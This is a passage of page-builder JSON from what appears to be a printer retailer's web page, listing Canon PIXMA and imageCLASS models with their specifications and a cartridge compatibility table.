TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f95d9d7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23b0d26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"137f63f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e0baf05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c3f6907\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p>\\n\\n<\\/div>\\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f2ce8e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a9b750\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td>\\n<td>Maintenance Cartridge MC-20<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Blue)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Chroma Optimizer)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Matte Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Photo Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Red)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PFI-50 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY iB4170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td>\\n<td>PGI-2700 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-2700XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S 